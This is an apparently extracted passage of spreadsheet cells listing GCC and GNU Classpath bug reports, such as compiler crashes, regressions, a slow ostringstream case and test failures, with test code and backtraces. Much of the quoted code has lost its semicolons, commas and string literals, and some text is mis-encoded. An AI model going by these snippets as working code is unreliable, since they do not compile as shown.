    <t>[3.4 Regression] ostringstream in gcc 3.4.x very slow for big data</t>
  </si>
  <si>
    <t>Hello 
I'm using ostringstream to write big amounts of data (some 10MB). For simplicity the 
data is written as single bytes. For gcc 3.3.x the time per character needed is almost 
constant for different amounts of data. But for 3.4.x this time increases dramatically:  
the time / char - ratio for 10 MB is 8 times that for 1 MB. 
This performance-decrease does not happen to string-concatenation using +=. 
Appended is an example program that has a switch to measure the performance of 
both string and ostringstream. 
I'm using linux 2.4.20 with SuSE 8.2 on a pentium 4 512 MB Ram 2.4 GHz. The gcc 
is 3.4.1 but the results are similar to 3.4.0. gcc -v tells:  
configured with: ../gcc-3.4.1/configure --enable-threads=posix --prefix=/usr 
--with-local-prefix=/usr/local --infodir=/usr/share/info --mandir=/usr/share/man 
--libdir=/usr/lib --enable-languages=cc++f77objcjavaada --disable-checking 
--enable-libgcj --with-gxx-include-dir=/usr/include/g++ --with-slibdir=/lib 
--with-system-zlib --enable-shared --enable-__cxa_atexit i486-suse-linux 
Thread-Modell: posix 
gcc-Version 3.4.1 
///// compile with ///// 
g++ -O2 -march=pentium4 -Wall -o strstream_t strstream_t.cpp 
///// strstream_t.cpp ///// 
/// 0: use ostringstream 
/// 1: use string 
#define STR_ONLY 0 
#include  
#include  
#include  
#include  
#if STR_ONLY 
# include  
#else 
# include  
#endif 
using namespace std 
static double time2dbl(long sec long usec) 
{ 
  return sec + usec * 1e-6 
} 
/// gives time in seconds and microseconds 
static void FineTimeInt(unsigned int *sec unsigned int *musec) 
{ 
  static struct timeval last_tv 
  struct timeval tv 
  gettimeofday( 
  last_tv = tv 
  *sec = tv.tv_sec 
  *musec = tv.tv_usec 
} 
/// gives time in seconds 
static double FineTime(void) 
{ 
  unsigned int sec musec 
  FineTimeInt( 
  return time2dbl(sec musec) 
} 
int main() 
{ 
  double oldr = 1 
  for(int n = 1 n &lt;=  10000000 n *= 10) { 
#if STR_ONLY 
    string str 
#else 
    ostringstream str 
#endif 
    double t0 = FineTime() 
    for(int i = 0 i &lt; n i++) { 
#if STR_ONLY 
      str += char(i) 
#else 
      str &lt;&lt; char(i) 
#endif 
    } 
    double t1 = FineTime() 
    double t = t1 - t0 
#if STR_ONLY 
    double l = str.length() 
#else 
    double l = str.str().length() 
#endif 
    double r = t / l 
    cout &lt;&lt; n &lt;&lt;   &lt;&lt; l &lt;&lt;   &lt;&lt;  t &lt;&lt;   &lt;&lt; r &lt;&lt;   &lt;&lt;  r / oldr &lt;&lt; endl 
    oldr = r 
  } 
}</t>
  </si>
  <si>
    <t>GCC-42878</t>
  </si>
  <si>
    <t>-fcompare-debug failure at -O1 (2)</t>
  </si>
  <si>
    <t>Command line:
gcc -O1 -fcompare-debug -c testcase.c
Tested revisions:
r156253 - crash
r155920 - crash
r155833 - crash
r155363 - crash
r154886 - crash
r154830 - OK
r153685 - OK
Output:
$ /mnt/svn/gcc-trunk/binary-156253-lto/bin/gcc -O1 -fcompare-debug -c testcase.c
gcc: testcase.c: -fcompare-debug failure</t>
  </si>
  <si>
    <t>CLASSPATH-25557</t>
  </si>
  <si>
    <t>Breaks badly on solaris9 during build</t>
  </si>
  <si>
    <t>Thanks to the usage of unportable shell construct 'test -ef' introduced in Mark's patch http://cvs.savannah.gnu.org/viewcvs/classpath/lib/gen-classlist.sh.in?root=classpath&amp;r1=1.19&amp;r2=1.20
my build dies with 
[snip]
./gen-classlist.sh: test: unknown operator -ef
cheers
dalibor topic</t>
  </si>
  <si>
    <t>GCC-10713</t>
  </si>
  <si>
    <t>ICE (segfault) after error: template declaration of 'typedef ....'</t>
  </si>
  <si>
    <t>Another fallout from c++/10661 which needs reduction.
Release:
3.3 CVS 20030503
Environment:
i686-pc-cygwin</t>
  </si>
  <si>
    <t>GCC-55229</t>
  </si>
  <si>
    <t>[4.8 Regression] FAIL: gcc.dg/tree-ssa/cunroll-1.c scan-tree-dump cunroll Unrolled loop 1 completely</t>
  </si>
  <si>
    <t>Caused by:
http://gcc.gnu.org/viewcvs?view=revision&amp;revision=193246
--- testsuite/gcc.dg/tree-ssa/cunroll-1.c	(revision 193240)
+++ testsuite/gcc.dg/tree-ssa/cunroll-1.c	(working copy)
@@ -15 +15 @@
 /* { dg-do compile } */
-/* { dg-options -O3 -fdump-tree-cunroll-details } */
+/* { dg-options -O3 -fdump-tree-cunrolli-details } */
 int a[2]
 test(int c)
 { 
@@ -104 +104 @@ test(int c)
 /* Array bounds says the loop will not roll much.  */
 /* { dg-final { scan-tree-dump Unrolled loop 1 completely .duplicated 1 times.. cunroll} } */
 /* { dg-final { scan-tree-dump Last iteration exit edge was proved true. cunroll} } */
-/* { dg-final { cleanup-tree-dump cunroll } } */
+/* { dg-final { cleanup-tree-dump cunrolli } } */
the scan-tree-dump checks look for cunroll but the name of the dump has been changed to cunrolli causing the UNRESOLVED. Should update dump names consistently.
Thanks
Kyrill</t>
  </si>
  <si>
    <t>GCC-56780</t>
  </si>
  <si>
    <t>--disable-install-libiberty still installs libiberty.a</t>
  </si>
  <si>
    <t>I'd like to build GCC with --disable-install-libiberty so that the version of libiberty.a provided by Binutils that is already installed will not be overwritten.  However the libiberty.a library is still installed even with that flag specified.
My full configure invocation (run from within ~/gcc-build) is:
../gcc-4.8.0-version/configure --prefix=/usr \
  --libexecdir=/usr/lib       \
  --enable-shared             \
  --enable-threads=posix      \
  --enable-__cxa_atexit       \
  --enable-clocale=gnu        \
  --enable-languages=cc++    \
  --disable-multilib          \
  --disable-bootstrap         \
  --disable-install-libiberty \
  --with-system-zlib
Additionally libiberty's configure script's help output states:
' --enable-install-libiberty       Install headers for end users'
For clarity that should probably read: 'Install headers and static library for end users'.  That way it's in agreement with what is also mentioned in libiberty.texi.
Thanks
Matt.</t>
  </si>
  <si>
    <t>GCC-55109</t>
  </si>
  <si>
    <t>internal compiler error: Segmentation fault while reporting error in template function instantiation</t>
  </si>
  <si>
    <t>The compiler command was:
g++ -DHAVE_CONFIG_H -I.    -O0 -g -std=c++11  -I src/ -Wall -Wextra -Werror -Wno-error=unused-variable -Wno-error=unused-parameter -Wno-error=unused-but-set-variable  -MT mc___server-NetworkServer.o -MD -MP -MF .deps/mc___server-NetworkServer.Tpo -c -o mc___server-NetworkServer.o `test -f 'src/network/NetworkServer.cpp' || echo './'`src/network/NetworkServer.cpp
The compiler output was (template stuff formatted for readability):
In file included from src/network/NetworkServer.cpp:22:0:
src/Scheduler.hpp: In instantiation of â€˜typename std::enable_if&lt;
    std::__and_&lt;
        std::is_convertible&lt;
            MemberFunc std::function&lt;
                decltype (MCServer::Scheduler::startThread::obj-&gt;
                    **MCServer::Scheduler::startThread::func(
                        MCServer::Scheduler::startThread::args ...
                    )
                ) (Args ...)
            &gt;
        &gt;
        std::is_member_function_pointer
    &gt;::value long unsigned int
&gt;::type
MCServer::Scheduler::startImportantThread(MemberFunc
Class = MCServer::Network::NetworkServer
Args = {}
typename std::enable_if&lt;
    std::__and_&lt;
        std::is_convertible&lt;
            MemberFunc std::function&lt;
                decltype (MCServer::Scheduler::startThread::obj-&gt;
                    **MCServer::Scheduler::startThread::func(
                        MCServer::Scheduler::startThread::args ...
                    )
                ) (Args ...)
            &gt;
        &gt;
        std::is_member_function_pointer
    &gt;::value long unsigned int
&gt;::type = long unsigned int]â€™:
src/network/NetworkServer.cpp:69:74:   required from here
src/Scheduler.hpp:187:156: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The backtrace of the segfault is:
#0  0x00000000004e00e7 in ?? ()
#1  0x00000000004e0464 in tsubst_copy_and_build ()
#2  0x00000000004dbffa in ?? ()
#3  0x00000000004e7ddf in ?? ()
#4  0x00000000004e105b in tsubst_copy_and_build ()
#5  0x00000000004dbffa in ?? ()
#6  0x00000000004e28c0 in tsubst ()
#7  0x00000000004e881c in ?? ()
#8  0x00000000004e2ceb in tsubst ()
#9  0x00000000004e5b13 in ?? ()
#10 0x00000000004df422 in ?? ()
#11 0x00000000004e2ec9 in tsubst ()
#12 0x00000000004e0dac in tsubst_copy_and_build ()
#13 0x00000000004e0ffe in tsubst_copy_and_build ()
#14 0x00000000004dbffa in ?? ()
#15 0x00000000004dcd0f in ?? ()
#16 0x00000000004dcc4c in ?? ()
#17 0x00000000004dc118 in ?? ()
#18 0x00000000004f0da3 in instantiate_decl ()
#19 0x00000000004f37ac in instantiate_pending_templates ()
#20 0x000000000050979d in cp_write_global_declarations ()
#21 0x0000000000831a58 in toplev_main ()
#22 0x00007ffff5eca725 in __libc_start_main () from /usr/lib/libc.so.6
#23 0x00000000004abaf1 in _start ()
which is of course very incomplete and I am currently compiling gcc with debug symbols to get a better backtrace but it will take some time.
The preprocessed source of the file being compiled is here: http://www.mediafire.com/?hdv6qddwnwclj82</t>
  </si>
  <si>
    <t>ZetaetaDaniel</t>
  </si>
  <si>
    <t>GCC-47369</t>
  </si>
  <si>
    <t>[x32] internal compiler error: in extract_insn at recog.c:2109</t>
  </si>
  <si>
    <t>On x32 branch revision 169032 gave
[hjl@gnu-6 ilp32-9]$ cat z.i 
struct FILE
{
  int x
}
extern struct FILE __sF[]
extern void bar (struct FILE *)
void dlmalloc_stats() {
   bar ((
}
[hjl@gnu-6 ilp32-9]$ make z.s
/export/build/gnu/gcc-x32/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc-x32/build-x86_64-linux/gcc/ -S -o z.s -mx32 -O2 -fPIC -dp  z.i
z.i: In function â€˜dlmalloc_statsâ€™:
z.i:9:1: error: unrecognizable insn:
(insn 5 4 6 3 (set (reg:SI 5 di)
        (const:SI (plus:SI (symbol_ref:SI (__sF) [flags 0x40] )
                (const_int 8 [0x8])))) z.i:8 -1
     (nil))
z.i:9:1: internal compiler error: in extract_insn at recog.c:2109
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [z.s] Error 1
[hjl@gnu-6 ilp32-9]$</t>
  </si>
  <si>
    <t>GCC-39881</t>
  </si>
  <si>
    <t>error_condition constructor and assignment postconditions not met</t>
  </si>
  <si>
    <t>The constructor and assignment operator that take a ErrorConditionEnum both have the postcondition: *this == make_error_condition(e). The system_error header as of 4.4.0 does not meet this postcondition because it always initialises the error_condition using the generic_category().
The following code:
  #include 
  #include 
  enum my_errc { my_err = 0 }
  class my_error_category_impl
    : public std::error_category
  {
  public:
    const char* name() const { return  }
    std::string message(int) const { return  }
  } my_error_category_instance
  std::error_condition make_error_condition(my_errc e)
  {
    return std::error_condition(
        static_cast(e)
        my_error_category_instance)
  }
  namespace std {
    template 
    struct is_error_condition_enum
      : public true_type {}
  }
  int main()
  {
    std::error_condition ec1(my_err)
    if (ec1 == make_error_condition(my_err))
      std::cout &lt;&lt; postcondition met\n
    else
      std::cout &lt;&lt; postcondition not met\n
    std::error_condition ec2
    ec2 = my_err
    if (ec2 == make_error_condition(my_err))
      std::cout &lt;&lt; postcondition met\n
    else
      std::cout &lt;&lt; postcondition not met\n
  }
Currently outputs:
  postcondition not met
  postcondition not met
when it should output:
  postcondition met
  postcondition met</t>
  </si>
  <si>
    <t>chris_kohlhoff</t>
  </si>
  <si>
    <t>GCC-78297</t>
  </si>
  <si>
    <t>ICE in finish_equivalences at fortran/trans-common.c:1246</t>
  </si>
  <si>
    <t>Gives an ICE down to at least 4.8 :
$ cat z1.f90
module m
   real :: a(2) b(2)
   real :: c(2) d(2)
   equivalence (a b)
   equivalence (c d)
   common /xcom/ a
end
block data
   use m
end block data
$ gfortran-7-20161106 -c z1.f90
z1.f90:10:0:
 end block data
internal compiler error: Segmentation fault
0xc3a64f crash_signal
        ../../gcc/toplev.c:338
0x747490 finish_equivalences
        ../../gcc/fortran/trans-common.c:1246
0x747490 gfc_trans_common(gfc_namespace*)
        ../../gcc/fortran/trans-common.c:1289
0x74d1b0 gfc_generate_block_data(gfc_namespace*)
        ../../gcc/fortran/trans-decl.c:6524
0x6e2133 gfc_parse_file()
        ../../gcc/fortran/parse.c:6102
0x725822 gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:198</t>
  </si>
  <si>
    <t>GCC-77830</t>
  </si>
  <si>
    <t>internal compiler error: in output_constructor_regular_field at varasm.c:4968 when using constexpr (with testcase)</t>
  </si>
  <si>
    <t>Created attachment 39739
Test Case
running 
c++ -g -std=gnu++14 test.cpp
doesn't compile with:
test.cpp:36:1: internal compiler error: in output_constructor_regular_field at varasm.c:4968
 }
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
removing constexpr on line 35 compiles successfully but doesn't run the constant expression.
c++ -v:
COLLECT_GCC=c++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-pc-linux-gnu/6.2.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /build/gcc-multilib/src/gcc/configure --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://bugs.archlinux.org/ --enable-languages=cc++adafortrangoltoobjcobj-c++ --enable-shared --enable-threads=posix --enable-libmpx --with-system-zlib --with-isl --enable-__cxa_atexit --disable-libunwind-exceptions --enable-clocale=gnu --disable-libstdcxx-pch --disable-libssp --enable-gnu-unique-object --enable-linker-build-id --enable-lto --enable-plugin --enable-install-libiberty --with-linker-hash-style=gnu --enable-gnu-indirect-function --enable-multilib --disable-werror --enable-checking=release
Thread model: posix
gcc version 6.2.1 20160830 (GCC)</t>
  </si>
  <si>
    <t>asad78611</t>
  </si>
  <si>
    <t>GCC-24713</t>
  </si>
  <si>
    <t>objc/execute/exceptions/foward-1.m fails on sh-elf with -O3</t>
  </si>
  <si>
    <t>See:
http://gcc.gnu.org/ml/gcc-testresults/2005-11/msg00320.html</t>
  </si>
  <si>
    <t>GCC-61688</t>
  </si>
  <si>
    <t>[5 Regression] ICE: tree check: expected record_type or union_type or qual_union_type have array_type in ipa_binfo_from_known_type_jfunc</t>
  </si>
  <si>
    <t>Created attachment 33062
preprocessed src
$ ./xgcc -B. ~/ice.ii -c -O2
/home/ryan/ice.ii:30:27: warning: inline function 'UBool icu::UnicodeString::isEmpty() const' used but never defined
        inline UBool       isEmpty (void) const
                           ^
/home/ryan/ice.ii: In member function 'void icu::DateIntervalFormat::concatSingleDate2TimeInterval(const UChar* std::int32_t const icu::UnicodeString&amp; UCalendarDateFields UErrorCode&amp;)':
/home/ryan/ice.ii:58:15: internal compiler error: tree check: expected record_type or union_type or qual_union_type have array_type in ipa_binfo_from_known_type_jfunc at ipa-prop.c:555
      void     DateIntervalFormat::concatSingleDate2TimeInterval (const UChar * format              int32_t formatLen              const UnicodeString &amp;              datePattern              UCalendarDateFields              field              UErrorCode &amp; status)     {
               ^
0xd98154 tree_check_failed(tree_node const* char const* int char const* ...)
	../../gcc/tree.c:9220
0x9e1327 tree_check3
	../../gcc/tree.h:2771
0x9e1327 ipa_binfo_from_known_type_jfunc(ipa_jump_func*)
	../../gcc/ipa-prop.c:555
0x9e1eba ipa_intraprocedural_devirtualization(gimple_statement_base*)
	../../gcc/ipa-prop.c:2467
0xcb7f8f eliminate_dom_walker::before_dom_children(basic_block_def*)
	../../gcc/tree-ssa-pre.c:4365
0xfca602 dom_walker::walk(basic_block_def*)
	../../gcc/domwalk.c:177
0xcb6412 eliminate
	../../gcc/tree-ssa-pre.c:4493
0xcb6693 execute
	../../gcc/tree-ssa-pre.c:4910
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
gcc version 4.10.0 20140702 (experimental) [trunk revision 212230] (GCC)</t>
  </si>
  <si>
    <t>GCC-37561</t>
  </si>
  <si>
    <t>[4.2/4.3 Regression] Revision 140405 caused g++.old-deja/g++.mike/warn1.C</t>
  </si>
  <si>
    <t>bash-3.2$ cat g++.old-deja/g++.mike/warn1.C
// { dg-do assemble  }
// { dg-options -Wall }
typedef char * charptr
typedef __SIZE_TYPE__ size_t
char c[]={'A''B''C''D'}
int i=size_t(
int *pp=
void foo() { }
int main()
{
 charptr(*pp)++	// { dg-warning  } 
 return 0
}
bash-3.2$ gcc -Wall -S -o /tmp/x.s g++.old-deja/g++.mike/warn1.C -m64
g++.old-deja/g++.mike/warn1.C: In function â€˜int main()â€™:
g++.old-deja/g++.mike/warn1.C:12: warning: value computed is not used
bash-3.2$ gcc -Wall -S -o /tmp/x.s g++.old-deja/g++.mike/warn1.C -m32
g++.old-deja/g++.mike/warn1.C: In function â€˜int main()â€™:
g++.old-deja/g++.mike/warn1.C:12: error: lvalue required as increment operand
bash-3.2$ 
On Linux/x86-64 I got
FAIL: g++.old-deja/g++.mike/warn1.C  (test for errors line 12)
FAIL: g++.old-deja/g++.mike/warn1.C (test for excess errors)</t>
  </si>
  <si>
    <t>GCC-6916</t>
  </si>
  <si>
    <t>Wrong assembler code for ARM/Thumb</t>
  </si>
  <si>
    <t>The following simple file when compiled with
arm-elf-gcc -o test.Os.s -S -Os -mthumb test.c
produces code like:
ldr  r3 [r3 sp]
which is wrong for Thumb mode (sp can not be used in thumb mode)
gas then complains with Error: lo register required
-O2 and -O3 give the same result.
Release:
unknown
Environment:
GNU C version 3.1 (arm-elf)
compiled by GNU C version 2.96 20000731 (RedHat Linux 7.3 2.96-110)
Configured with: /home/oleg/arm/tools/gcc/configure --target=arm-elf --enable-languages=cc++ --disable-shared --disable-nls --with-gnu-as --with-gnu-ld --disable-checking -
-with-multilibs --with-newlib --disable-newlib-io-float
Thread model:single
How-To-Repeat:
arm-elf-gcc -o test.Os.s -S -Os test.c
or
arm-elf-gcc -o test.Os.o -c -Os test.c</t>
  </si>
  <si>
    <t>omakarenko</t>
  </si>
  <si>
    <t>GCC-47628</t>
  </si>
  <si>
    <t>non-compliant C++0x erase methods on STL containers</t>
  </si>
  <si>
    <t>Apologizes if this has changed in the draft standard (my copy of n3092 indicates it hasn't):
As of r169874 std::set std::map std::multiset std::multimap std::unordered_set std::unordered_map std::unordered_multiset and std::unordered_multimap have C++0x erase methods instead of taking an `iterator' (or a range of `iterators' for some of the aforementioned containers) the GNU implementation of these containers accept a `const_iterator'. In ISO/IEC N3092 the specification of the erase() method is in [associative.reqmts] (Section 23.2.4) table 99 and [unord.req] (Section 23.2.5) table 100.
I do not believe this problem affects the library in C++03/C++99 mode as a preprocessor macro selects the old C++99/C++03 version of erase(). This is problematic in particular for std::map where it can cause a call to erase() to be ambigious. I noticed this problem when compiling the Boost.Signals library (I'm a Boost developer) with a freshly built GCC 4.6.0.
Please find attached a patch against trunk that fixes this problem.</t>
  </si>
  <si>
    <t>blelbach</t>
  </si>
  <si>
    <t>GCC-4388</t>
  </si>
  <si>
    <t>Failure of gcc.c-torture/execute/20010924-1.c on irix6.5</t>
  </si>
  <si>
    <t>New test gcc.c-torture/execute/20010924-1.c fails on irix6.5.
The error is:
/exd4/billingd/src/gcc-mainline/gcc/testsuite/gcc.c-torture/execute/20010924-1.c:28: Internal error: Segmentation fault
Running under gdb I see:
Starting program: /exd4/billingd/obj/gcc-mainline/gcc/cc1 -fpreprocessed 20010924-1.i -quiet -dumpbase 20010924-1.c -O0 -w -version -o 20010924-1.s
GNU CPP version 3.1 20010924 (experimental) (cpplib) [AL 1.1 MM 40] SGI running IRIX 6.x
GNU C version 3.1 20010924 (experimental) (mips-sgi-irix6.5)
        compiled by GNU C version 3.1 20010924 (experimental).
Program received signal SIGSEGV Segmentation fault.
0x100619c4 in digest_init (type=0x10450f00 init=0x74 require_constant=1 
    constructor_constant=1)
    at /exd4/billingd/src/gcc-mainline/gcc/c-typeck.c:4693
4693                  &amp;&amp; TREE_CODE (TYPE_SIZE (type)) == INTEGER_CST
(gdb) where
#0  0x100619c4 in digest_init (type=0x10450f00 init=0x74 require_constant=1 
    constructor_constant=1)
    at /exd4/billingd/src/gcc-mainline/gcc/c-typeck.c:4693
#1  0x10065100 in output_init_element (value=0x10440240 type=0x10450f00 
    field=0x10450f78 pending=1)
    at /exd4/billingd/src/gcc-mainline/gcc/c-typeck.c:6255
#2  0x10065ce0 in process_init_element (value=0x10440240)
    at /exd4/billingd/src/gcc-mainline/gcc/c-typeck.c:6533
#3  0x1002c6e4 in yyparse_1 () at bison.simple:1437
#4  0x10034904 in yyparse () at /exd4/billingd/src/gcc-mainline/gcc/c-lex.c:166
#5  0x100c3e54 in compile_file (name=0x10420f30 20010924-1.i)
    at /exd4/billingd/src/gcc-mainline/gcc/toplev.c:2328
#6  0x100c9b7c in toplev_main (argc=11 argv=0x7ffedf04)
    at /exd4/billingd/src/gcc-mainline/gcc/toplev.c:4973
#7  0x10099f9c in main (argc=11 argv=0x1043c1e0)
    at /exd4/billingd/src/gcc-mainline/gcc/main.c:34
Release:
GNU C version 3.1 20010924 (experimental) (mips-sgi-irix6.5)
Environment:
mips-sgi-irix6.5</t>
  </si>
  <si>
    <t>GCC-1981</t>
  </si>
  <si>
    <t>using declarations in function templates</t>
  </si>
  <si>
    <t>The following code doesn't compile (both 2.95.2 and 3.0 branch).
It gives :
test.C: In function `void f(T) [with T = int]':
test.C:18:   instantiated from here
test.C:13: `swap' undeclared (first use this function)
test.C:13: (Each undeclared identifier is reported only once for each
   function it appears in.)
Note 1 : it works when f() is not template.
Note 2 : if A == std (my original case in fact) then it works with g++ 2.95.2
         but not 3.0 !  So it's a regression.
Release:
2.97 20010212 (experimental)
Environment:
System: Linux zosma 2.2.14 #1 SMP Fri Jan 14 14:39:36 MET 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /u/zosma/0/prisme/spion/gcc/gcc/configure --enable-languages=c++ --prefix=/u/zosma/0/prisme/spion/gcc/Linux_CVS_v3
How-To-Repeat:
namespace A {
template 
void swap(T&amp; a T&amp; b) {
  T tmp = a a = b b = tmp
}
}
template 
void f(T) {
  using A::swap
  int ij
  swap(ij)
}
int main() {
  f(1)
}</t>
  </si>
  <si>
    <t>GCC-78793</t>
  </si>
  <si>
    <t>list_read.c: 7 * possible unintended fallthrough ?</t>
  </si>
  <si>
    <t>I just tried a build of trunk fortran and got this:
1.
trunk/libgfortran/io/list_read.c:975:10: warning: this statement may fall through [-Wimplicit-fallthrough=]
Source code is
    case '!':
      if (!dtp-&gt;u.p.namelist_mode)
        goto bad_integer
    CASE_SEPARATORS:        /* Single null.  */
Suggest either document the fallthrough or add a possible missing break.
2.
../../../trunk/libgfortran/io/list_read.c:1033:10: warning: this statement may fall through [-Wimplicit-fallthrough=]
../../../trunk/libgfortran/io/list_read.c:852:10: warning: this statement may fall through [-Wimplicit-fallthrough=]
../../../trunk/libgfortran/io/list_read.c:1646:10: warning: this statement may fall through [-Wimplicit-fallthrough=]
../../../trunk/libgfortran/io/list_read.c:1705:7: warning: this statement may fall through [-Wimplicit-fallthrough=]
../../../trunk/libgfortran/io/list_read.c:1524:10: warning: this statement may fall through [-Wimplicit-fallthrough=]
../../../trunk/libgfortran/io/list_read.c:1401:7: warning: this statement may fall through [-Wimplicit-fallthrough=]
Duplicates.</t>
  </si>
  <si>
    <t>GCC-67130</t>
  </si>
  <si>
    <t>[6 Regression] ICE: tree check: expected identifier_node have template_decl in write_unqualified_id at cp/mangle.c:1218</t>
  </si>
  <si>
    <t>trippels@gcc2-power8 test % cat type_traits.ii
namespace std {
template  struct __success_type
template  void declval()
template  class decay {
public:
  typedef int type
}
template  struct common_type
struct A {
  template 
  static __success_type)&gt;::type&gt; _S_test
}
template  struct __common_type_impl : A {
  typedef decltype(_S_test) type
}
template 
struct common_type : __common_type_impl {}
}
template  struct B { struct _ }
template  typename B::_ type
template  class&gt; struct C
template  class f&gt; C metafunction
template  struct B::_ {}
namespace detail {
template  struct _decltype
}
template  class F&gt; struct C {
  template 
  auto operator()(T...)
      -&gt; decltype(type...&gt;::type&gt;)
}
auto common_type = metafunction(0 0)
trippels@gcc2-power8 test % c++ -c type_traits.ii
type_traits.ii: In instantiation of â€˜decltype (type...&gt;::type&gt;) C &gt;::operator()(T ...) [with T = {int int} F = std::common_type decltype (type...&gt;::type&gt;) = B &gt;::_ typename F...&gt;::type = std::__success_type]â€™:
type_traits.ii:29:8: internal compiler error: tree check: expected identifier_node have template_decl in write_unqualified_id at cp/mangle.c:1218
   auto operator()(T...)
        ^
0x10d2be23 tree_check_failed(tree_node const* char const* int char const* ...)
        ../../gcc/gcc/tree.c:9499
0x103d188f tree_check
        ../../gcc/gcc/tree.h:2858
0x103d188f write_unqualified_id
        ../../gcc/gcc/cp/mangle.c:1218
0x103cb5ab write_expression
        ../../gcc/gcc/cp/mangle.c:2828
0x103cf47f write_type
        ../../gcc/gcc/cp/mangle.c:2129
0x103d1ec7 write_bare_function_type
        ../../gcc/gcc/cp/mangle.c:2527
0x103d4a67 mangle_decl_string
        ../../gcc/gcc/cp/mangle.c:3498
0x103d4c7f get_mangled_id
        ../../gcc/gcc/cp/mangle.c:3520
0x103d504f mangle_decl(tree_node*)
        ../../gcc/gcc/cp/mangle.c:3587
0x10d2d30f decl_assembler_name(tree_node*)
        ../../gcc/gcc/tree.c:658
0x1056c583 symbol_table::insert_to_assembler_name_hash(symtab_node* bool)
        ../../gcc/gcc/symtab.c:157
0x1056d86f symbol_table::symtab_initialize_asm_name_hash()
        ../../gcc/gcc/symtab.c:249
0x1058a3ff analyze_functions
        ../../gcc/gcc/cgraphunit.c:1175
0x1058b267 symbol_table::finalize_compilation_unit()
        ../../gcc/gcc/cgraphunit.c:2477
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-78451</t>
  </si>
  <si>
    <t>[7 Regression] FAIL: gcc.target/i386/sse-22a.c: error: inlining failed in call to always_inline '_mm512_setzero_ps'</t>
  </si>
  <si>
    <t>The gcc.target/i386/sse-22a.c test has been failing with the following error:
FAIL: gcc.target/i386/sse-22a.c (test for excess errors)
Excess errors:
/home/msebor/build/gcc-78284/gcc/include/avx512fintrin.h:244:1: error: inlining failed in call to always_inline '_mm512_setzero_ps': target specific option mismatch
On the gcc-rtegression list it's been reported as failing with an ICE:
  https://gcc.gnu.org/ml/gcc-regression/2016-11/msg00380.html
The failure was mentioned in the following discussion:
  https://gcc.gnu.org/ml/gcc-patches/2016-11/msg02066.html</t>
  </si>
  <si>
    <t>GCC-47581</t>
  </si>
  <si>
    <t>[4.5 regression] Unnecessary adjustments to stack pointer</t>
  </si>
  <si>
    <t>Whilst investigating PR4079 (which affects PPC) I found some strange adjustments to the stack pointer when compiling with 4.6.0 (20110129) on x86.
For reference the C code from that PR is:
unsigned mulh(unsigned a unsigned b)
{
        return ((unsigned long long)a * (unsigned long long)b) &gt;&gt; 32
}
On 4.5.2 using -O2 -m32 -fomit-frame-pointer this produced the following succinct code:
mulh:
        movl    8(%esp) %eax
        mull    4(%esp)
        movl    %edx %eax
        ret
        .size   mulh .-mulh
        .ident  GCC: (GNU) 4.5.2
However on 4.6.0 with the same arguments:
mulh:
.LFB0:
        .cfi_startproc
        subl    $4 %esp           &lt;== isn't this unnecessary?
        .cfi_def_cfa_offset 8
        movl    12(%esp) %eax     &lt;== this could just be 8(%esp)
        mull    8(%esp)            &lt;== this could just be 4(%esp)
        addl    $4 %esp           &lt;== isn't this unnecessary?
        .cfi_def_cfa_offset 4
        movl    %edx %eax
        ret
        .cfi_endproc
.LFE0:
        .size   mulh .-mulh
        .ident  GCC: (GNU) 4.6.0 20110129 (experimental)</t>
  </si>
  <si>
    <t>GCC-81936</t>
  </si>
  <si>
    <t>ICE in dwarf2out_die_ref_for_decl at dwarf2out.c:5543</t>
  </si>
  <si>
    <t>There are 172 new ICEs in libgomp testsuite (x86_64 with nvptx offloading):
...
$ grep 'internal compiler error' libgomp.sum | wc -l
172
...
F.i.:
...
FAIL: libgomp.c/pr66714.c (internal compiler error)
...
In more detail:
...
during IPA pass: pure-const
libgomp/testsuite/libgomp.c/pr66714.c: In function 'fn3._omp_fn.1':
libgomp/testsuite/libgomp.c/pr66714.c:17:1: internal compiler error: in dwarf2out_die_ref_for_decl at dwarf2out.c:5543
0x9006f6 dwarf2out_die_ref_for_decl
        gcc/dwarf2out.c:5542
0xb9d803 lto_write_tree_1
        gcc/lto-streamer-out.c:422
0xba8977 lto_write_tree
        gcc/lto-streamer-out.c:448
0xba8977 lto_output_tree_1
        gcc/lto-streamer-out.c:482
xba8977 DFS::DFS(output_block* tree_node* bool bool bool)
        gcc/lto-streamer-out.c:669
0xba8ceb lto_output_tree(output_block* tree_node* bool bool)
        gcc/lto-streamer-out.c:1632
0xfa5db5 streamer_write_chain(output_block* tree_node* bool)
        gcc/tree-streamer-out.c:505
0xba5ce6 output_function
        gcc/lto-streamer-out.c:2084
0xba5ce6 lto_output()
        gcc/lto-streamer-out.c:2378
0xc1bb6e write_lto
        gcc/passes.c:2608
0xc1f356 ipa_write_summaries_1
        gcc/passes.c:2672
0xc1f356 ipa_write_summaries()
        gcc/passes.c:2732
0x887464 ipa_passes
        gcc/cgraphunit.c:2376
0x887464 symbol_table::compile()
        gcc/cgraphunit.c:2477
0x889793 symbol_table::finalize_compilation_unit()
        gcc/cgraphunit.c:2631
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
...</t>
  </si>
  <si>
    <t>CLASSPATH-22912</t>
  </si>
  <si>
    <t>java.lang.Double contains native methods</t>
  </si>
  <si>
    <t xml:space="preserve">The following methods in java.lang.Double can safely be moved to VMDouble.
  // Package visible for use by Float.
  static native String toString(double d boolean isFloat)
  /**
   * Initialize JNI cache.  This method is called only by the
   * static initializer when using JNI.
   */
  private static native void initIDs()
</t>
  </si>
  <si>
    <t>GCC-35721</t>
  </si>
  <si>
    <t>ASSOCIATED returns false when strides confusing</t>
  </si>
  <si>
